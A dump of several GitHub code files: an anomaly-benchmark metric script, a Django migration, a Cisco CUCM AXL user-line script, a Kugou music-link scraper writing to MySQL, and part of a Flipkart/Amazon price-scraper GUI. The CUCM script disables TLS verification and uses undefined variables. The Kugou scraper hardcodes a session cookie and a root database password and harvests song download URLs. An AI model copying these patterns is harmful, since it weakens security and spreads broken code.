{"api_name": "catanatron.models.actions.ActionType", "line_number": 432, "usage_type": "name"}, {"api_name": "catanatron.models.actions.ActionType.MARITIME_TRADE", "line_number": 439, "usage_type": "attribute"}, {"api_name": "catanatron.models.actions.ActionType", "line_number": 439, "usage_type": "name"}, {"api_name": "catanatron.models.actions.ActionType.MOVE_ROBBER", "line_number": 448, "usage_type": "attribute"}, {"api_name": "catanatron.models.actions.ActionType", "line_number": 448, "usage_type": "name"}, {"api_name": "catanatron.state_functions.get_player_buildings", "line_number": 458, "usage_type": "call"}, {"api_name": "catanatron.models.enums.BuildingType.SETTLEMENT", "line_number": 459, "usage_type": "attribute"}, {"api_name": "catanatron.models.enums.BuildingType", "line_number": 459, "usage_type": "name"}, {"api_name": "catanatron.state_functions.get_player_buildings", "line_number": 462, "usage_type": "call"}, {"api_name": "catanatron.models.enums.BuildingType.CITY", "line_number": 462, "usage_type": "attribute"}, {"api_name": "catanatron.models.enums.BuildingType", "line_number": 462, "usage_type": "name"}, {"api_name": "catanatron.models.actions.ActionType.MOVE_ROBBER", "line_number": 467, "usage_type": "attribute"}, {"api_name": "catanatron.models.actions.ActionType", "line_number": 467, "usage_type": "name"}, {"api_name": "catanatron_gym.features.build_production_features", "line_number": 473, "usage_type": "call"}, {"api_name": "catanatron.models.actions.ActionType.MOVE_ROBBER", "line_number": 491, "usage_type": "attribute"}, {"api_name": "catanatron.models.actions.ActionType", "line_number": 491, "usage_type": "name"}]}
+{"seq_id": "9985162922", "text": "import os\nimport argparse\nimport numpy as np\nfrom PIL import Image\n\nfrom measures import get_measures\n\ntrain_id_in = 0\ntrain_id_out = 1\nignore_id = 255\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--pred_npy\", type=str)\n parser.add_argument(\"--gt_anno\", type=str)\n opt = parser.parse_args()\n \n # Load pred npy\n assert os.path.exists(opt.pred_npy)\n pred = np.load(opt.pred_npy)\n \n # Load gt anno\n assert os.path.exists(opt.gt_anno)\n gt = np.asarray(Image.open(opt.gt_anno))\n \n height, width = gt.shape\n \n if pred.ndim == 3:\n assert pred.shape[0] == 1\n pred = pred[0]\n assert pred.shape == gt.shape\n \n converted_gt = np.zeros_like(gt)\n converted_gt += train_id_in\n converted_gt[gt == 254] = train_id_out\n converted_gt[gt == ignore_id] = ignore_id # ignored label\n \n import IPython; IPython.embed()\n \n auroc, aupr, fpr = get_measures(pred[converted_gt == train_id_out], pred[converted_gt == train_id_in])\n\n print(auroc, aupr, fpr)\n", "repo_name": "AIR-DISCOVER/video-anomaly-benchmarking", "sub_path": "metric/utils/tests.py", "file_name": "tests.py", "file_ext": "py", "file_size_in_byte": 1065, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "numpy.load", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 24, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 24, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 24, "usage_type": "name"}, {"api_name": "numpy.zeros_like", "line_number": 33, "usage_type": "call"}, {"api_name": "IPython.embed", "line_number": 38, "usage_type": "call"}, {"api_name": "measures.get_measures", "line_number": 40, "usage_type": "call"}]}
+{"seq_id": "9162991364", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('entrances', '0039_auto_20170521_1512'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='entrance',\n name='logged_in',\n field=models.BooleanField(default=False, verbose_name='logged_in'),\n preserve_default=True,\n ),\n ]\n", "repo_name": "Happyandhappy/django_email", "sub_path": "entrances/migrations/0040_entrance_logged_in.py", "file_name": "0040_entrance_logged_in.py", "file_ext": "py", "file_size_in_byte": 471, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.migrations.AddField", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}]}
+{"seq_id": "7809646943", "text": "import requests\nfrom zeep import Client\nfrom zeep.transports import Transport\nfrom requests.auth import HTTPBasicAuth\nimport sys\n\n\n###############DATI DA COMPLETARE\nUSER = \"user\"\nPASSWORD = \"password\"\nIP = \"10.20.30.40\"\nVERSION = \"11.5\"\n#fkuniversalLineTemplate = \"d78e1398-a65c-b1f6-48d1-913c8a8901f5\"\n#################################\n\n\n\nsession = requests.Session()\nsession.verify = False\nsession.auth = HTTPBasicAuth(user, password)\ntransport = Transport(session=session)\nclient = Client('file:///mnt/c/Users/Operatore/Downloads/axlsqltoolkit/schema/'+version+'/AXLAPI.wsdl',transport=transport)\n\nservice = client.create_service(\"{http://www.cisco.com/AXLAPIService/}AXLAPIBinding\",\"https://\"+ip+\"/axl/\")\n\n\nlistUser = service.listUser(searchCriteria={\"userid\":\"federico.tabbo\"},returnedTags=())[\"return\"][\"user\"]\n\nfor endUser in listUser:\n\tcurUser = service.getUser(uuid=endUser[\"uuid\"])[\"return\"][\"user\"]\n\tprint(curUser)\n\tpriExtensionPattern = curUser[\"primaryExtension\"][\"pattern\"]\n\tpriExtensionRoutePartition = curUser[\"primaryExtension\"][\"routePartitionName\"]\n\tprint(priExtensionPattern)\n\tprint(\"------------\")\n\tcurDN = service.getLine(pattern=priExtensionPattern,routePartitionName=priExtensionRoutePartition)[\"return\"][\"line\"]\n\tcurDNpkid = curDN[\"uuid\"][1:-1]\n\tcurDNassociatedDevices = curDN[\"associatedDevices\"][\"device\"]\n\n\tfor phone in curDNassociatedDevices:\n\t\tcurPhone = service.getPhone(name=phone)[\"return\"][\"phone\"]\n\t\tprint(curPhone[\"name\"])\n\t\tcurPhoneLines = curPhone[\"lines\"]\n\n\t\tprint(\"---------\")\n\t\tprint(curPhoneLines[\"line\"][0])\n\t\tprint(\"----------\")\n\n\t\tfor line in curPhoneLines[\"line\"]:\n\t\t\tprint(\"FOR LOOP\")\n\t\t\tprint(\"LINE\")\n\t\t\tprint(line)\n\t\t\tprint(\"PRIEXTENSION\")\n\t\t\tprint(priExtensionPattern)\n\t\t\tif int(line[\"dirn\"][\"pattern\"]) == int(priExtensionPattern):\n\t\t\t\trightLine = curPhoneLines[\"index\"]\n\n\t\tservice.updatePhone(name=phone,lines={\"line\":{\"index\":rightLine,\"dirn\":{\"pattern\":priExtensionPattern,\"routePartitionName\":priExtensionRoutePartition},\"associatedEndusers\":{\"enduser\":{\"userId\":curUser}}}})", "repo_name": "icovada/miscellaneous-cucm-utilities", "sub_path": "devicenumplanmapendusermap.py", "file_name": "devicenumplanmapendusermap.py", "file_ext": "py", "file_size_in_byte": 2030, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.Session", "line_number": 18, "usage_type": "call"}, {"api_name": "requests.auth.HTTPBasicAuth", "line_number": 20, "usage_type": "call"}, {"api_name": "zeep.transports.Transport", "line_number": 21, "usage_type": "call"}, {"api_name": "zeep.Client", "line_number": 22, "usage_type": "call"}]}
+{"seq_id": "14791969648", "text": "import requests\n# 导入xpath模块\nfrom lxml import etree\nimport re\nfrom bs4 import BeautifulSoup\n# 连接数据库的模块\nimport pymysql\n\nmusic_info_url_list = []\nmusic_download_url_list = []\n\n# 榜单网页url\nmusic_list_url =\"https://www.kugou.com/yy/rank/home/1-8888.html?from=rank\"\n#music_list_url = \"https://www.kugou.com/yy/rank/home/1-23784.html?from=rank\"#红歌榜1\n#music_list_url = \"https://www.kugou.com/yy/rank/home/1-31308.html?from=rank\"#新歌版0\n#music_list_url = \"https://www.kugou.com/yy/rank/home/1-44412.html?from=rank\"#说唱榜2\n#music_list_url = \"https://www.kugou.com/yy/rank/home/1-33165.html?from=rank\"#粤语榜3\n# 榜单网页源代码\nmusic_list_html = requests.get(music_list_url).text\n\n# 获取歌手和歌曲名\ndef get_music_name():\n element = etree.HTML(music_list_html)\n # @title是提取li标签中title属性的内容 获取歌曲名称和歌手\n music_list_name_info = element.xpath('//div[@class=\"pc_temp_songlist \"]/ul/li/@title')\n return music_list_name_info\n\n# 将音乐名称和歌手 存储到列表中\nmusic_name_list = get_music_name()\n\n# 获取存储音乐信息的网页url 存储到列表中 返回值为列表\ndef get_music_info_url():\n soup = BeautifulSoup(music_list_html,features=\"lxml\")\n script = soup.find_all('script')[-1]\n # print(script)\n # print(type(script))\n # 查找符合正则表达式的字符串 此时script变量为bs4格式 我们需要将其转化为字符串格式\n info = re.findall(r'\\[.*\\]',str(script))[1]\n # print(info)\n # 替换符合正则表达式的字符串\n info = re.sub(r'\\[|\\]',\"\",info)\n # print(type(info))\n # 分割符合正则表达式的字符串\n info = re.split(r'\\},\\{',info)\n # print(info)\n for i in range(len(info)):\n # 获取hash属性值\n hash = re.findall(r'H.*?,',info[i])[0].split('\"')[2]\n # 获取album_id属性值\n album_id = re.findall(r'album_id.*?,',info[i])[0].split(\":\")[1].replace(\",\",\"\")\n # print(album_id)\n if len(hash) > 0 and len(album_id) > 0:\n music_info_url = \"https://wwwapi.kugou.com/yy/index.php?r=play/getdata&hash=\" + hash + \"&album_id=\" + album_id\n else:\n print(str(i) + \" \" + \"为空\")\n # 将音乐信息网页地址存储到列表中\n music_info_url_list.append(music_info_url)\n return music_info_url_list\n\n# 获取音乐下载地址\ndef get_music_download_url():\n # 使用请求头 不然获取不到音乐信息\n headers = {\"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36\",\n \"cookie\": \"kg_mid=5177dda4cc5327932ceb0652b3abbdf4; kg_dfid=2AveiS1FiBds3dWdin1RsaQ6; kg_dfid_collect=d41d8cd98f00b204e9800998ecf8427e; Hm_lvt_aedee6983d4cfc62f509129360d6bb3d=1611227172; Hm_lpvt_aedee6983d4cfc62f509129360d6bb3d=1611237914\"}\n # 循环得到的存储音乐信息的网页url\n\n for music_info_url in music_info_url_list:\n\n music_info_html = requests.get(music_info_url,headers=headers).text\n # print(music_info_url)\n # print(music_info_html)\n # 获取音乐下载地址\n music_download_url = re.findall(r'play_url.*?\\.mp3',music_info_html)[0].split('\"')[-1].replace(\"\\\\\",\"\")\n # print(music_download_url)\n # 将播放地址添加到列表中\n music_download_url_list.append(music_download_url)\n return music_download_url_list\n\n\n\n# 将获取到的数据添加到数据库中\ndef put_info_to_mysql():\n # 连接数据库\n db = pymysql.connect(host=\"127.0.0.1\",port=3306, user=\"root\",password=\"123456\",database=\"music\",charset=\"utf8\")\n # 创建指针\n cursor = db.cursor()\n for i in range(len(music_download_url_list)):\n # print(music_name_list)\n # 歌曲名称\n name = music_name_list[i].split(\" - \")[1]\n # 歌手\n singer = music_name_list[i].split(\" - \")[0]\n # 播放地址\n url = music_download_url_list[i]\n print(name + \" \" + singer + \" \" + url)\n # 执行的SQL语句\n sql = \"\"\"insert into musicsystem_info(Name,Singer,Time,Url,Type) values ('{}','{}','{}','{}','{}')\"\"\".format(name,singer,\"2020.1.22\",url,0)\n try:\n # 执行SQL语句\n cursor.execute(sql)\n # 提交\n db.commit()\n print(\"执行成功\")\n except:\n # 添加失败时回滚\n db.rollback()\n print(\"执行失败\")\n # 关闭数据库连接\n db.close()\n\n\n# 主函数\ndef main():\n get_music_info_url()\n get_music_download_url()\n put_info_to_mysql()\n\nif __name__ == '__main__':\n main()\n", "repo_name": "Blue-wu/music", "sub_path": "kugou.py", "file_name": "kugou.py", "file_ext": "py", "file_size_in_byte": 4679, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 19, "usage_type": "call"}, {"api_name": "lxml.etree.HTML", "line_number": 23, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 23, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 33, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 38, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 41, "usage_type": "call"}, {"api_name": "re.split", "line_number": 44, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 48, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 50, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 69, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 73, "usage_type": "call"}, {"api_name": "pymysql.connect", "line_number": 84, "usage_type": "call"}]}
+{"seq_id": "30616171", "text": "import tkinter as tk\nimport tkinter.ttk as ttk\nfrom ttkthemes import themed_tk\n\nimport webbrowser\nfrom functools import partial\nimport ctypes\nimport urllib.parse \t\t\t\t\t\nimport urllib\nimport re\t\t\t\t\t\t\t\t# Regular Expressions\nfrom PIL import ImageTk,Image\t\t\t# Image processing\nfrom urllib.request import urlopen\t\t# Fetching a web image\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nclass basicProcesses():\n\tdef progress(self,val):\n\t\tself.master.master.tabLowerProgress[\"value\"]=val\n\t\tself.master.master.tabLowerProgress.update_idletasks()\n\n\tdef optimizeSearchInput(self,searchKeys=\"\"):\n\t\tsearchKeys = searchKeys.strip().lower()\n\t\treturn urllib.parse.quote(searchKeys)\n\n\tdef openWebsite(self,link):\n\t\twebbrowser.open_new(link)\n\n\tdef getSoup(self,searchURL,progressFactor=50):\n\t\theaders = {\"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36\", \"Accept-Encoding\":\"gzip, deflate\", \"Accept\":\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\", \"DNT\":\"1\",\"Connection\":\"close\", \"Upgrade-Insecure-Requests\":\"1\"}\n\t\tsource = requests.get(searchURL,headers=headers).content\n\t\tself.progress(progressFactor)\n\t\tsoup = BeautifulSoup(source,'lxml')\n\t\twith open(\"munmmun.html\",\"w\",encoding=\"utf-8\") as file:\n\t\t\tfile.write(soup.prettify())\n\t\treturn soup\n\n\tdef __init__(self,master=None):\n\t\tpass\n\n\nclass initResultCardShopping(ttk.Frame,basicProcesses):\n\tdef resultCardShoppingLoadWidgets(self,scrapeShoppingData,thumbName,gridCol,success):\n\t\tself.cardShoppingFrameElements[thumbName] = {}\n\t\tif success:\n\t\t\tself.cardShoppingFrameElements[thumbName]['name'] = ttk.Label(self,text=scrapeShoppingData['name'],\t\t\t\t\t\tfont = (\"Calibri\",15,'bold'),wrap=600,style=\"linkShopping.TLabel\")\n\t\t\tself.cardShoppingFrameElements[thumbName]['finalprice'] = ttk.Label(self,text='₹ '+scrapeShoppingData['finalprice'],\tfont = (\"Calibri\",19,'bold'),wrap=700,style=\"textShopping.TLabel\")\n\t\t\tself.cardShoppingFrameElements[thumbName]['discount'] =ttk.Label(self,text=\"Discount - \"+scrapeShoppingData['discount'],font = (\"Calibri\",14),wrap=700,style=\"textShopping.TLabel\")\n\t\t\tself.cardShoppingFrameElements[thumbName]['initialprice'] = ttk.Label(self,text='₹ '+scrapeShoppingData['initialprice'],font = (\"Calibri\",11,'overstrike'),wrap=700,style=\"textShopping.TLabel\")\n\t\t\tif scrapeShoppingData['rating']=='No Rating':\n\t\t\t\tself.cardShoppingFrameElements[thumbName]['rating'] = ttk.Label(self,text=scrapeShoppingData['rating'],\t\t\t\tfont = (\"Calibri\",13),wrap=700,style=\"textShopping.TLabel\")\n\t\t\telse:\n\t\t\t\tself.cardShoppingFrameElements[thumbName]['rating'] = ttk.Label(self,text=scrapeShoppingData['rating']+' ⭐',\t\t\tfont = (\"Calibri\",14,'bold'),wrap=600,style=\"textShopping.TLabel\")\n\t\t\tif scrapeShoppingData['reviewphrase'] == 'No Review':\n\t\t\t\tself.cardShoppingFrameElements[thumbName]['reviewphrase'] = ttk.Label(self,text=scrapeShoppingData['reviewphrase'],\tfont = (\"Calibri\",13),wrap=600,style=\"textShopping.TLabel\")\n\t\t\telse:\n\t\t\t\tself.cardShoppingFrameElements[thumbName]['reviewphrase'] = ttk.Label(self,text=scrapeShoppingData['reviewphrase'],\tfont = (\"Calibri\",13,'bold'),wrap=650,style=\"textShopping.TLabel\")\n\t\t\tself.cardShoppingFrameElements[thumbName]['review'] = ttk.Label(self,text=scrapeShoppingData['review'],\t\t\t\t\tfont = (\"Calibri\",13),wrap=650,style=\"textShopping.TLabel\")\n\t\telse:\n\t\t\tself.cardShoppingFrameElements[thumbName]['name'] = ttk.Label(self,text=scrapeShoppingData['name'],\t\t\t\t\tfont = (\"Calibri\",17,'bold'),wrap=600,style=\"linkShopping.TLabel\")\t\n\n\t\tself.cardShoppingFrameElements[thumbName]['frameCaptionImage'] = ImageTk.PhotoImage(Image.open(f\"images/{thumbName}-caption.png\"))\n\t\tself.cardShoppingFrameElements[thumbName]['frameCaption'] = ttk.Label(self,image=self.cardShoppingFrameElements[thumbName]['frameCaptionImage'],style=\"textShopping.TLabel\")\n\n\t\tself.cardShoppingFrameElements[thumbName]['searchurl'] = scrapeShoppingData['searchurl']\n\t\tself.cardShoppingFrameElements[thumbName]['name'].bind(\"\", lambda event : event.widget.config(style=\"linkShoppingActive.TLabel\"))\n\t\tself.cardShoppingFrameElements[thumbName]['name'].bind(\"\", lambda event : event.widget.config(style=\"linkShopping.TLabel\"))\n\t\tself.cardShoppingFrameElements[thumbName]['name'].bind(\"\", lambda event : super(initResultCardShopping,self).openWebsite(self.cardShoppingFrameElements[thumbName]['searchurl']))\n\n\t\tself.cardShoppingFrameElements[thumbName]['frameCaption'].\tgrid(row=0,column=gridCol*2,columnspan=2,sticky='NW',padx=0,pady=0,ipadx=0,ipady=0)\n\t\tself.cardShoppingFrameElements[thumbName]['name'].\t\t\tgrid(row=1,column=gridCol*2,columnspan=2,sticky='NW',padx=3,pady=5,ipadx=0,ipady=0)\n\t\tif success:\n\t\t\tself.cardShoppingFrameElements[thumbName]['finalprice'].\tgrid(row=2,column=gridCol*2+1,sticky='NW',padx=0,pady=0,ipadx=0,ipady=0)\n\t\t\tself.cardShoppingFrameElements[thumbName]['discount'].\t\tgrid(row=3,column=gridCol*2+1,sticky='NW',padx=0,pady=0,ipadx=0,ipady=0)\n\t\t\tself.cardShoppingFrameElements[thumbName]['initialprice'].\tgrid(row=4,column=gridCol*2+1,sticky='NW',padx=0,pady=0,ipadx=0,ipady=0)\n\t\t\tself.cardShoppingFrameElements[thumbName]['rating'].\t\tgrid(row=5,column=gridCol*2+1,sticky='NW',padx=0,pady=2,ipadx=0,ipady=0)\n\t\t\tself.cardShoppingFrameElements[thumbName]['reviewphrase'].\tgrid(row=6,column=gridCol*2,columnspan=2,sticky='NW',padx=3,pady=2,ipadx=0,ipady=0)\n\t\t\tself.cardShoppingFrameElements[thumbName]['review'].\t\tgrid(row=7,column=gridCol*2,columnspan=2,sticky='NW',padx=3,pady=0,ipadx=0,ipady=0)\n\n\t\tif not success:\n\t\t\tself.cardShoppingFrameElements[thumbName]['image'] = ImageTk.PhotoImage(Image.open(\"images/product-not-found-280x280.png\"))\n\t\telif scrapeShoppingData['imageurl'] == '':\n\t\t\tself.cardShoppingFrameElements[thumbName]['image'] = ImageTk.PhotoImage(Image.open(\"images/image-not-available-280x280.png\"))\n\t\telse: \n\t\t\timgFetched = urlopen(scrapeShoppingData['imageurl'])\n\t\t\timgFetched = Image.open(imgFetched)\n\t\t\t[imgW, imgH] = imgFetched.size\n\t\t\tif (imgW >= imgH and imgW > self.imageSideLength):\n\t\t\t\timgWt = imgW\n\t\t\t\timgW = self.imageSideLength\n\t\t\t\timgH = (self.imageSideLength * imgH) // imgWt\n\t\t\telif (imgH > imgW and imgH > self.imageSideLength):\n\t\t\t\timgHt = imgH\n\t\t\t\timgH = self.imageSideLength\n\t\t\t\timgW = (self.imageSideLength * imgW) // imgHt\n\t\t\timgFetched = imgFetched.resize((imgW,imgH), Image.ANTIALIAS)\n\t\t\tself.cardShoppingFrameElements[thumbName]['image'] = ImageTk.PhotoImage(imgFetched)\n\t\tself.cardShoppingFrameElements[thumbName]['imageurl'] = ttk.Label(self,image=self.cardShoppingFrameElements[thumbName]['image'])\n\t\tself.cardShoppingFrameElements[thumbName]['imageurl'].grid(row=2,column=gridCol*2,rowspan=4,padx=10,pady=10,ipadx=0,ipady=0)\n\n\tdef printResultsShopping(self,dataset):\n\t\tprint(\"{\")\n\t\tfor i in dataset:\n\t\t\tprint(\"\\t\",i,\" : \",dataset[i])\n\t\tprint(\"}\")\n\n\tdef setScrapeShoppingFlipkartData(self,soupShoppingFlipkartProduct):\n\t\tshoppingFlipkartProductProp = soupShoppingFlipkartProduct.select_one(\"._2_AcLJ\")\n\t\tif shoppingFlipkartProductProp != None:\n\t\t\tshoppingFlipkartProductProp = re.split(\"url\\(|\\?q=\",shoppingFlipkartProductProp.attrs[\"style\"])[1] + \"?q=100\"\n\t\t\tself.scrapeShoppingFlipkartData['imageurl'] = shoppingFlipkartProductProp.replace('/128',f'/{self.imageSideLength}',2)\n\t\tshoppingFlipkartProductProp = soupShoppingFlipkartProduct.p\n\t\tif shoppingFlipkartProductProp != None:\n\t\t\tshoppingFlipkartProductProp = shoppingFlipkartProductProp.text\n\t\t\tshoppingFlipkartProductProp = re.sub(\"\\n+\", \" \", shoppingFlipkartProductProp)\n\t\t\tself.scrapeShoppingFlipkartData['name'] = shoppingFlipkartProductProp\n\t\tshoppingFlipkartProductProp = soupShoppingFlipkartProduct.select_one(\"._1iCvwn\")\n\t\tif shoppingFlipkartProductProp != None:\n\t\t\tself.scrapeShoppingFlipkartData['discount'] = shoppingFlipkartProductProp.text[:-4]\n\t\tshoppingFlipkartProductProp = soupShoppingFlipkartProduct.select_one(\"._3auQ3N\")\n\t\tif shoppingFlipkartProductProp != None:\n\t\t\tself.scrapeShoppingFlipkartData['initialprice'] = shoppingFlipkartProductProp.text[1:]\n\t\tshoppingFlipkartProductProp = soupShoppingFlipkartProduct.select_one(\"._1vC4OE._3qQ9m1\")\n\t\tif shoppingFlipkartProductProp != None:\n\t\t\tself.scrapeShoppingFlipkartData['finalprice'] = shoppingFlipkartProductProp.text[1:]\n\t\tshoppingFlipkartProductProp = soupShoppingFlipkartProduct.select_one(\"._1i0wk8\")\n\t\tif shoppingFlipkartProductProp != None:\n\t\t\tself.scrapeShoppingFlipkartData['rating'] = shoppingFlipkartProductProp.text\n\t\telse:\n\t\t\tself.scrapeShoppingFlipkartData['rating'] = 'No Rating'\n\t\tshoppingFlipkartProductProp = soupShoppingFlipkartProduct.select_one(\"._2xg6Ul\")\n\t\tif shoppingFlipkartProductProp != None:\n\t\t\tself.scrapeShoppingFlipkartData['reviewphrase'] = shoppingFlipkartProductProp.text.replace(\"&\",\"&\")\n\t\tshoppingFlipkartProductProp = soupShoppingFlipkartProduct.select_one(\".qwjRop div div\")\n\t\tif shoppingFlipkartProductProp != None:\n\t\t\tshoppingFlipkartProductProp = shoppingFlipkartProductProp.decode_contents()\n\t\t\tshoppingFlipkartProductProp = shoppingFlipkartProductProp.replace('\\\"',\"\").replace(\"&\",\"&\")\n\t\t\tshoppingFlipkartProductProp = re.sub(\"\\n+\", \" \", shoppingFlipkartProductProp)\n\t\t\tself.scrapeShoppingFlipkartData['review'] = re.sub(\"<.*>\",\" \",shoppingFlipkartProductProp)[:400]+\"...\"\n\t\tif(self.scrapeShoppingFlipkartData['reviewphrase']=='-' and self.scrapeShoppingFlipkartData['review']=='-'):\n\t\t\tself.scrapeShoppingFlipkartData['reviewphrase'] = 'No Review'\n\t\t\tself.scrapeShoppingFlipkartData['review'] = ''\n\n\tdef scrapeShoppingFlipkart(self):\n\t\tshoppingFlipkartSearchKeys = super().optimizeSearchInput(self.searchKeys)\n\t\tshoppingFlipkartSearchURL = f\"https://www.flipkart.com/search?q={shoppingFlipkartSearchKeys}&otracker=search&otracker1=search&sort=relevance\"\n\t\tsuper().progress(20)\n\t\tsoupShoppingFlipkart = super().getSoup(shoppingFlipkartSearchURL,40)\n\t\tsuper().progress(50)\n\t\tself.scrapeShoppingFlipkartData = {'name':\"-\",'initialprice':\"-\",'discount':\"-\",'finalprice':\"-\",'rating':\"-\",'reviewphrase':\"-\",'review':\"-\",'imageurl':\"\",'searchurl':shoppingFlipkartSearchURL}\n\n\t\twith open(\"flip.html\",\"w\",encoding=\"utf-8\") as file:\n\t\t\tfile.write(soupShoppingFlipkart.prettify())\n\n\t\tshoppingFlipkartNoResult = soupShoppingFlipkart.select_one(\".DUFPUZ\")\n\t\tif shoppingFlipkartNoResult != None:\n\t\t\tself.scrapeShoppingFlipkartData[\"name\"] = \"No product found :(\"\n\t\t\treturn 0\n\t\telse:\n\t\t\tshoppingFlipkartSearchURL = soupShoppingFlipkart.select_one(\"a[target=_blank]\").attrs['href']\n\t\t\tshoppingFlipkartSearchURL = f\"https://flipkart.com{shoppingFlipkartSearchURL}\"\n\t\t\tsoupShoppingFlipkartProduct = super().getSoup(shoppingFlipkartSearchURL)\n\n\t\t\tself.scrapeShoppingFlipkartData['searchurl']=shoppingFlipkartSearchURL\n\t\t\t# with open(\"amz.html\",\"w\",encoding=\"utf-8\") as file:\n\t\t\twith open(\"flp.html\",\"w\",encoding=\"utf-8\") as file:\n\t\t\t\tfile.write(soupShoppingFlipkartProduct.prettify())\n\n\t\t\tself.setScrapeShoppingFlipkartData(soupShoppingFlipkartProduct)\n\t\t\tself.printResultsShopping(self.scrapeShoppingFlipkartData)\n\t\t\treturn 1\n\n\tdef setScrapeShoppingAmazonData(self,soupShoppingAmazonProduct):\n\t\tshoppingAmazonProductProp = soupShoppingAmazonProduct.select_one(\".a-dynamic-image\")\n\t\tif shoppingAmazonProductProp != None:\n\t\t\t# self.scrapeShoppingAmazonData['imageurl'] = shoppingAmazonProductProp.attrs[\"data-old-hires\"]\n\t\t\tself.scrapeShoppingAmazonData['imageurl'] = shoppingAmazonProductProp.attrs[\"data-a-dynamic-image\"].split(\"\\\"\")[1]\n\t\tshoppingAmazonProductProp = soupShoppingAmazonProduct.select_one(\"#title\")\n\t\tif shoppingAmazonProductProp != None:\n\t\t\tshoppingAmazonProductProp = shoppingAmazonProductProp.text.strip()\n\t\t\tself.scrapeShoppingAmazonData['name'] = re.sub(\"\\n+\", \" \", shoppingAmazonProductProp)\n\t\tshoppingAmazonProductProp = soupShoppingAmazonProduct.select_one(\".priceBlockSavingsString\")\n\t\tif shoppingAmazonProductProp != None:\n\t\t\tself.scrapeShoppingAmazonData['discount'] = shoppingAmazonProductProp.text.strip()\n\t\tshoppingAmazonProductProp = soupShoppingAmazonProduct.select_one(\".priceBlockStrikePriceString\")\n\t\tif shoppingAmazonProductProp != None:\n\t\t\tself.scrapeShoppingAmazonData['initialprice'] = shoppingAmazonProductProp.text.strip()[2:]\n\t\tshoppingAmazonProductProp = soupShoppingAmazonProduct.select_one(\"#priceblock_ourprice,#priceblock_saleprice,#priceblock_dealprice\")\n\t\tif shoppingAmazonProductProp != None:\n\t\t\tself.scrapeShoppingAmazonData['finalprice'] = shoppingAmazonProductProp.text.strip()[2:]\n\t\tshoppingAmazonProductProp = soupShoppingAmazonProduct.select_one(\"i.averageStarRating\")\n\t\tif shoppingAmazonProductProp != None:\n\t\t\tself.scrapeShoppingAmazonData['rating'] = shoppingAmazonProductProp.text.split(\" \")[0]\n\t\telse:\n\t\t\tself.scrapeShoppingAmazonData['rating'] = 'No rating'\n\t\tshoppingAmazonProductProp = soupShoppingAmazonProduct.select_one(\"a.a-text-bold span\")\n\t\tif shoppingAmazonProductProp != None:\n\t\t\tself.scrapeShoppingAmazonData['reviewphrase'] = shoppingAmazonProductProp.text.replace(\"&\",\"&\")\n\t\t# shoppingAmazonProductProp = soupShoppingAmazonProduct.select_one(\".a-expander-partial-collapse-content span\")\n\t\tshoppingAmazonProductProp = soupShoppingAmazonProduct.select_one(\"#cm-cr-dp-review-list .a-expander-partial-collapse-content span\")\n\t\tif shoppingAmazonProductProp != None:\n\t\t\tshoppingAmazonProductProp = shoppingAmazonProductProp.decode_contents()\n\t\t\tshoppingAmazonProductProp = shoppingAmazonProductProp.replace('\\\"',\"\").replace(\"&\",\"&\")\n\t\t\tshoppingAmazonProductProp = re.sub(\"\\n+\", \" \", shoppingAmazonProductProp)\n\t\t\tself.scrapeShoppingAmazonData['review'] = re.sub(\"<.*>\",\" \",shoppingAmazonProductProp)[:400]+'...'\n\t\tif(self.scrapeShoppingAmazonData['reviewphrase']=='-' and self.scrapeShoppingAmazonData['review']=='-'):\n\t\t\tself.scrapeShoppingAmazonData['reviewphrase'] = 'No Review'\n\t\t\tself.scrapeShoppingAmazonData['review'] = ''\n\n\tdef scrapeShoppingAmazon(self):\n\t\tshoppingAmazonSearchKeys = super().optimizeSearchInput(self.searchKeys)\n\t\tshoppingAmazonSearchURL = f\"http://www.amazon.in/s/ref=nb_sb_noss_2?url=search-alias%3Daps&field-keywords={shoppingAmazonSearchKeys}\"\n\t\tsuper().progress(20)\n\t\tsoupShoppingAmazon = 